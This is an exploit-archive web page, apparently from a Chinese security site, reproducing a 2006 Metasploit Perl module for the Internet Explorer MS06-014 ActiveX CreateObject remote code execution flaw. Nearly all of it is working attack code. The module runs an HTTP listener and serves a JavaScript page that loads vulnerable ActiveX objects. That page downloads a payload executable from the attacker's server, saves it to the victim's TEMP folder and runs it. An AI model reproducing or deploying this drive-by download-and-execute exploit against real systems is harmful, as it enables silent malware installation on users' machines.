首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) (1)
来源:hdm [at] metasploit.com 作者:H D Moore 发布时间:2006-08-14  

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::ie_createobject;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;

my $advanced =
{
'Gzip' => [1, 'Enable gzip content encoding'],
'Chunked' => [1, 'Enable chunked transfer encoding'],
};

my $info =
{
'Name' => 'Internet Explorer COM CreateObject Code Execution',
'Version' => '$Revision: 3753 $',
'Authors' =>
[
'H D Moore <hdm [at] metasploit.com>',
],

'Description' =>
Pex::Text::Freeform(qq{
This module exploits a generic code execution vulnerability in Internet
Explorer by abusing vulnerable ActiveX objects.
}),

'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winxp', 'win2003' ],
'Priv' => 0,

'UserOpts' =>
{
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
},

'Payload' =>
{
'Space' => 4000,
'Keys' => ['-bind'],
},
'Refs' =>
[
['MSB', 'MS06-014']
],

'DefaultTarget' => 0,
'Targets' =>
[
[ 'Automatic' ],

# Patched
[ 'MS06-014 - RDS.DataControl', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],

# Not marked as safe
[ 'UNKNOWN - RDS.DataSpace', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],

# Not marked as safe
[ 'UNKNOWN - Business Object Factory ', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'],

# Not marked as safe
[ 'UNKNOWN - Outlook Data Object', '{0006F033-0000-0000-C000-000000000046}'],

# Found exploitable in the wild (no details)
[ 'UNKNOWN - Outlook.Application', '{0006F03A-0000-0000-C000-000000000046}'],

# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
[ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'],
[ 'UNKNOWN - SoftwareDistribution.WebControl.1', '{6414512B-B978-451D-A0D8-FCFDF33E833C}'],

# Part of the WMI SDK, currently unpatched/unreported
[ 'UNKNOWN - WMIScriptUtils.WMIObjectBroker2.1', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'],

# Visual Studio components, not marked as safe
[ 'UNKNOWN - VsmIDE.DTE', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'],
[ 'UNKNOWN - DExplore.AppObj.8.0', '{639F725F-1B2D-4831-A9FD-874847682010}'],
[ 'UNKNOWN - VisualStudio.DTE.8.0', '{BA018599-1DB3-44f9-83B4-461454C84BF8}'],
[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'],
[ 'UNKNOWN - VsaIDE.DTE', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'],
],

'Keys' => [ 'ie' ],

'DisclosureDate' => '',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit
{
my $self = shift;

my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('HTTPHOST'),
LocalPort => $self->GetVar('HTTPPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp'
);
my $client;

# Did the listener create fail?
if (not defined($server)) {
$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
return;
}

my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
Pex::Utils::SourceIP('1.2.3.4') :
$self->GetVar('HTTPHOST');

$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

while (defined($client = $server->accept())) {
$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
}

return;
}

sub HandleHttpClient
{
my $self = shift;
my $fd = shift;
my $shellcode = my $shellcode = $self->GetVar('EncodedPayload')->Payload;

# Set the remote host information
my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);

# Read the HTTP command
my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);

# Read the HTTP headers
my $headers;
while ( (my $line = $fd->RecvLine(10))) {
$headers .= $line;
last if $line eq "\r\n";
}

if ($url =~ /\?payload/) {
$self->PrintLine("[*] HTTP Client $rhost:$rport asked for payload...");
my $content = Pex::Utils::CreateWin32PE($shellcode, 'ie_createobject');
$fd->Send($self->BuildResponse($content, 'application/octet-stream'));
$fd->Close;
return;
}
$self->PrintLine("[*] HTTP Client $rhost:$rport asked for exploit page...");
$fd->Send($self->BuildResponse($self->GenerateHTML(), 'text/html'));
$fd->Close;
return;
}

sub GenerateHTML {
my $self = shift;
my $target_idx = $self->GetVar('TARGET');
my $objects = "";

if ($target_idx == 0) {
foreach my $target (@{ $self->Targets }) {
if ($target->[1]) {
$objects .= "'".$target->[1]."',";
}
}
} else {
my $target = $self->Targets->[$target_idx];
$objects .= "'".$target->[1]."',";
}

my $data =
qq#
<html><head><title></title>
<script language="javascript">

function Log(m) {
var log = document.createElement('p');
log.innerHTML = m;
document.body.appendChild(log);

}

function CreateO(o, n) {
var r = null;

try { eval('r = o.CreateObject(n)') }catch(e){}

if (! r) {
try { eval('r = o.CreateObject(n, "")') }catch(e){}
}

if (! r) {
try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}

return(r);
}

function Go(a) {
Log('Creating helper objects...');
var s = CreateO(a, "WScript.Shell");
var o = CreateO(a, "ADODB.Stream");
var e = s.Environment("Process");

Log('Ceating the XMLHTTP object...');
var url = document.location + '?payload';
var xml = null;
var bin = e.Item("TEMP") + "metasploit.exe";
var dat;

try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}

if (! xml) return(0);

Log('Downloading the payload...');
xml.open("GET", url, false)
xml.send(null);
dat = xml.responseBody;

Log('Writing the payload to disk...');
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
o.SaveToFile(bin, 2);

Log('Executing the payload...');
s.Run(bin,0);
}

function Exploit() {
var i = 0;
var t = new Array(${objects}null);

while (t[i]) {
var a = null;

if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}

if (a) {
try {
var b = CreateO(a, "WScript.Shell");
if (b) {
Log('Loaded ' + t[i]);
Go(a);
return(0);
}
} catch(e){}
}
i++;
}
Log('Exploit failed.');
}
</script>
</head>
<body onload='Exploit()'>
<p>Initializing...</p>
</body>
</html>
#;
}

sub BuildResponse {
my ($self, $content, $type) = @_;
$type ||= 'text/plain';

my $response =
"HTTP/1.1 200 OK\r\n" .
"Content-Type: $type\r\n";

if ($self->GetVar('Gzip')) {
$response .= "Content-Encoding: gzip\r\n";
$content = $self->Gzip($content);
}
if ($self->GetVar('Chunked')) {
$response .= "Transfer-Encoding: chunked\r\n";
$content = $self->Chunk($content);
} else {
$response .= 'Content-Length: ' . length($content) . "\r\n" .
"Connection: close\r\n";
}

$response .= "\r\n" . $content;

return $response;
}

sub Chunk {
my ($self, $content) = @_;

my $chunked;
while (length($content)) {
my $chunk = substr($content, 0, int(rand(10) + 1), '');
$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
}
$chunked .= "0\r\n\r\n";

return $chunked;
}

sub Gzip {
my $self = shift;
my $data = shift;
my $comp = int(rand(5))+5;

my($wtr, $rdr, $err);

my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
print $wtr $data;
close ($wtr);
local $/;

return (<$rdr>);
}

1;



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Opera 9 IRC Client Remote Deni
·MS Windows NetpIsRemote() Remo
·Opera 9 IRC Client Remote Deni
·PHP <= 4.4.3 / 5.1.4 (sscan
·XMB <= 1.9.6 Final basename
·Woltlab Burning Board <= 2.
·Nokia Symbian 60 3rd Edition B
·MS Windows PNG File IHDR Block
·WEBinsta CMS <= 0.3.1 (temp
·VMware 5.5.1 COM Object Arbitr
·OpenMPT <= 1.17.02.43 Multi
·MS Windows PNG File IHDR Block
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved